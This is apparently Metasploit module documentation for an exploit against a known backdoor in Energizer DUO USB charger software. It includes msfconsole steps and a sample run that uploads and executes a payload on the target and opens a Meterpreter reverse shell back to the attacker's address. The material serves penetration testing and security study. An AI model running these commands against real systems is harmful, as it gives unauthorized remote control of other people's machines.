## Vulnerable Application

More information can be found on the [Rapid7 Blog](https://blog.rapid7.com/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.

The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).

## Verification Steps

  1. Install the vulnerable software
  2. Start msfconsole
  3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
  4. Do: `set rhost`
  5. Do: `set payload`
  6. Do: `exploit`

## Scenarios

  A run against the backdoor

  ```
    msf > use exploit/windows/backdoor/energizer_duo_payload
    msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
    msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
    msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
    msf exploit(energizer_duo_payload) > exploit
    
    [*] Started reverse handler on 192.168.0.228:4444
    [*] Trying to upload C:\NTL0ZTL4DhVL.exe...
    [*] Trying to execute C:\NTL0ZTL4DhVL.exe...
    [*] Sending stage (747008 bytes)
    [*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
    
    meterpreter > getuid
    Server username: XPDEV\Developer
  ```